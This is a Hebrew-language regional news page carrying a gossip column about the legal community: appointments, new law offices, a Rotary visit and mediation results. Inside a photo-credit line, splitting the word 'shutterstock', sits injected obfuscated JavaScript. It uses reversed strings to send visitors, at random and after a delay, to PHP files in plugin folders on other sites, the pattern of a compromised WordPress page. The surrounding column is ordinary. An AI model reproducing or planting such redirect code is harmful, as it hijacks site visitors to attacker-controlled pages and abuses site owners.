fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

עורכת הדין שיצאה מהבידוד היישר לכנרת ומי קיבל תפקיד יוקרתי

עו"ד מימון טולדנו מונה לנציג יחיד מטעם ראש לשכת עורכי בוועדה הציבורית למינוי יועץ משפטי לכנסת, וגם: מהו קוד הלבוש בתחנת הרדיו?
מדור הפרקליטים | צילום: shutterstock
מדור הפרקליטים | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

התפקיד היוקרתי של עו"ד מימון טולדנו

ברכות גם לעו"ד מימון טולדנו לרגל מינויו לנציג יחיד מטעם ראש לשכת עורכי בוועדה הציבורית למינוי יועץ משפטי לכנסת. בוועדה חברים גם נשיאת בית המשפט העליון (או שופט עליון מטעמה), יו"ר ועדת חוקה, חוק ומשפט של הכנסת ח"כ יעקב אשר, יו"ר ועדת הכנסת ח"כ איתן גינזבורג, יו"ר הוועדה לביקורת המדינה ח"כ עופר שלח, נציב שירות המדינה פרופ' דניאל הרשקוביץ ופרופסור מהאקדמיה המשפטית, שייבחר על ידי כל דקני האוניברסיטאות בארץ. איש רב כובעים הוא עו"ד מימון טולדנו.

נציג יחיד מטעם ראש לשכת עורכי בוועדה הציבורית למינוי יועץ משפטי לכנסת. עו"ד מימון טולדנו | צילום: יח"צ
הוועדה הציבורית למינוי יועץ משפטי לכנסת. עו"ד מימון טולדנו | צילום: יח"צ

מהבידוד לכנרת

עו"ד ליטל יצחק מקרית אתא וילדיה אלעד ולידור יצאו מבידוד של שבוע היישר לבילוי בחופי הכנרת. אושר ובריאות.

כיף בכנרת. עו"ד ליטל יצחק והילדים | צילום: עצמי
כיף בכנרת. עו"ד ליטל יצחק והילדים | צילום: עצמי

דירוג שווה

ברכות למשרד עורכי הדין ערן בקר, שנבחר, זו השנה השנייה ברציפות, על ידי מותג הדירוג הבינלאומי היוקרתי cofacebdi, לאחד ממשרדי עורכי הדין המובילים בישראל בתחום הנזיקין והביטוח. נזכיר, שבחודש שעבר דורג משרדו של עו"ד בקר גם על ידי dun's 100 כאחד המשרדים המובילים בארץ בתחום הנזיקין והרשלנות הרפואית. שאפו.

חובות הבטיחות. עו"ד ערן בקר | צילום: אלוניס
דירוג גבוה. עו"ד ערן בקר | צילום: אלוניס

שותפות נשית

עו״ד בתאל מנור הפתיעה השבוע את שותפתה החדשה למשרד, עו״ד יערית אוליאל, לכבוד יום הולדתה במארז מתוקים ובלונים. המדור מאחל לשתיים שותפות פורייה ועתירת הישגים.

יום הולדת. עו"ד בתאל מנור ושותפתה למשרד, עו"ד יערית אוליאל | צילום: עצמי
יום הולדת. עו"ד בתאל מנור ושותפתה למשרד, עו"ד יערית אוליאל | צילום: עצמי

משרד חדש

ברכות חמות לעו"ד דור וולך מקרית מוצקין לרגל פתיחת המשרד. עו"ד וולך מתמחה בתחום הנדל"ן – רכישת קרקעות, התחדשות עירונית, דירות יד ראשונה ושנייה, עסקאות תמ"א, מיסוי מקרקעין, וליטיגציה תוך התמקדות בליקויי בנייה. לעו"ד וולך ניסיון רב בייצוג רוכשים, מוכרים, דיירים וחברות. בהצלחוש.

מומחה בתחום הנדל"ן. עוד דור וולך | צילום: עצמי
מומחה בתחום הנדל"ן. עוד דור וולך | צילום: עצמי

מנומר זה הכי, אחותי

האדווקטית הבלתי נלאית, להלן: עו״ד הולי שוורץ, שעוסקת בדיני צבא וגם מגישה בהתנדבות תוכנית רדיו, שפונה לחיילים ובני משפחותיהם, פגשה השבוע בתחנה את עמיתתה רונית גלוסקא, ואופסססס, השתיים נתפסו בלבוש מנומר.
עו"ד הולי שוורץ, זה קוד הלבוש ברדיו?
"לא. זו הייתה מקריות משעשעת, ולכן בחרנו להנציח אותה".

קוד לבוש מנומר? עו"ד הולי שוורץ ורונית גלוסקא | צילום: עצמי
קוד לבוש מנומר? עו"ד הולי שוורץ ורונית גלוסקא | צילום: עצמי

פגישה שכזו

שלוש שנים לאחר שהמכון הרפואי במשרד התחבורה שלל את רישיון הנהיגה של תושב חיפה אלעד וינטל, 36, רישיונו הושב לו בזכות מאבק עיקש של משרד עורכי הדין מוטאי מצגר גרבאוי שייצג אותו. חוצמיזה ובלי קשר, עו"ד בלהה מצגר, שותפה במשרד הנ"ל, נפגשה השבוע עם יוסי ברבי, חבר מועצת העיר קרית ביאליק ויו"ר איגוד עובדי האבטחה, הניקיון והטיפול הסיעודי בהסתדרות, אבל למדור אין מושג על מה הם דיברו.

פגישת עבודה. עו"ד בלהה מצגר ויוסי ברבי | צילום: עצמי
פגישת עבודה. עו"ד בלהה מצגר ויוסי ברבי | צילום: עצמי

סוגרים שנה

בתום שנת משפט מאתגרת, התכנסו להם חברי קבוצת עורכי הדין HPL למפגש מכונן, שבו סוכמו היעדים שהושגו ונקבעו היעדים לשנה הבאה.
עו"ד יפעת שי יוספזון, מה מתבשל על האש?
"סיכמנו שנה מלאת הפתעות ואתגרים, עסקאות מורכבות ופרויקטים ייחודיים. הקבוצה הוכיחה את נחיצותה גם בתקופת הגל הראשון של משבר הקורונה, עת הבלבול היה רב, שכן הייחודיות של HPL היא בוותק של חבריה, לצד מקצועיות והיכרות בינאישית. כל אלה מייצרים יתרון חדשני של חיבור כוחות ומוחות של 13 משרדי עורכי דין, מהאיכותיים ביותר שיש, המהווים מענה משפטי שאף משרד יחיד אינו יכול לספק. אני גאה בכל ראשי התחומים בקבוצת HPL שהם עורכי דין מבריקים, וחשוב מכך – אנשים נהדרים".
אחרי נאום כזה, המדור ספיצ'לס.

מסכמים שנת משפט מאתגרת. חברי קבוצת עורכי הדין HPL | צילום: עצמי
מסכמים שנת משפט מאתגרת. חברי קבוצת עורכי הדין HPL | צילום: עצמי

מלב אל לב

תמיכה מכל הלב. לפני כמה שבועות המדור עדכן בדבר תמיכת ארגון רוטרי ישראל ברוטרי נצרת עילית ובתעשיינית ג'וליה זהר, הבעלים של טחינת אל-ארז. זהר זכתה לקיתונות של שנאה וקריאות להחרים את הטחינה של מפעלה בשל תמיכתה בקהילה הערבית הלהט"בית. עו"ד משה יונאי, שעמד מאחורי יוזמת התמיכה, הגיע השבוע למפעל של זהר, כשהוא מלווה בנגיד רוטרי ישראל המכהן, ד"ר נחום פרנקל, מי שיכהן בשנה הבאה, עו"ד חיים קנת וחברים נוספים, והחבורה המכובדת הזו לא הגיעה בידיים ריקות והביאה לזהר, גם היא חברת רוטרי, תעודת הוקרה על פועלה למען הקהילה הערבית הלהט"בית בדרך של מימון קו מצוקה. עו"ד יונאי שימש נגיד רוטרי ישראל לפני כשבע שנים וכיום חבר מועדון רוטרי קישון, הפעיל בקריות.

תמיכה והוקרה. עו"ד משה יונאי וג'וליה זהר | צילום: עצמי
תמיכה והוקרה. עו"ד משה יונאי וג'וליה זהר | צילום: עצמי

תיק כבד

המדור תפס השבוע את עו״ד אדיר צבי, יו״ר ועדת מקרקעין בלשכת עורכי הדין, כשיצא לדיון משותף בתיק ליקויי בנייה ענק בבית המשפט המחוזי עם עו״ד דניאל בכר, שותף בכיר במשרד עורכי הדין גלזר, בכר ושות׳ וסגן יו"ר ועדת מקרקעין ארצית. בהצלחוש.

תיק ליקויי בנייה ענק. עורכי הדין אדיר צבי ודניאל בכר | צילום: עצמי
תיק ליקויי בנייה ענק. עורכי הדין אדיר צבי ודניאל בכר | צילום: עצמי

עסקת רכישה

עו"ד עמירם אלקובי עדכן את המדור שהשבוע נחתמה עסקת רכישה חשובה וגדולה, שפרטיה יימסרו בקרוב, אבל המדור היה חייב לרחרח.
אליך, עו"ד אלקובי.
"בואי נאמר שבקרוב ייפתח משרד חדש לסניף חיפה. מי שליווה את העסקה מטעם המשרד שלי הוא עו"ד שימי אלקובי. אין בינינו קשר משפחתי, אבל יש בינינו חברות נפש אמיתית ויחסי עבודה מקצועיים".

שומרים על חשאיות. עו"ד עמירם אלקובי, מנהל השיווק של משרדו דודי ישראל ועו"ד שימי אלקובי
שומרים על חשאיות. עו"ד עמירם אלקובי, מנהל השיווק של משרדו דודי ישראל ועו"ד שימי אלקובי

רגע לפני שבת

עו"ד עידית רייכרט ויועץ התקשורת אופיר שפיגל סיימו את פגישתם ביום שישי האחרון קצת לפני כניסת השבת. השניים מטפלים משפטית וציבורית באחד התיקים שמסעירים בימים אלו את המדינה. שתדעו.

תיק שמסעיר את המדינה. עו"ד עידית רייכרט | צילום: Q Elite beauty
תיק שמסעיר את המדינה. עו"ד עידית רייכרט | צילום: Q Elite beauty

שלום בית

תוצאות גל שני. עו"ד סופי ספקטור סיימה בשבוע שחלף שלושה הליכי גישור בין שלושה זוגות שונים, הליכים שנמשכו כחודשיים.
עו"ד ספקטור, דברי סיכום.
"מדובר בזוגות שהיו דקה לפני ניהול הליך בזירה המשפטית. הצלחתי להגיע איתם להסכמי גירושים בהליך גישור מרתק, שחלקו אף התקיים בזום. ההסכמים כולם אושרו על ידי בית המשפט. זוג נוסף, שהרגשתי שאינו בשל לגירושים, הופנה על ידי לטיפול משפחתי וזוגי וחזר לחיים משותפים".
אם כך, גם המדור חותם בהפי אנד.

"אין כאן מנצחים ומפסידים. יש מצב נתון". עו"ד סופי ספקטור | צילום: דורון גולן
הליכי גישור. עו"ד סופי ספקטור | צילום: דורון גולן

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות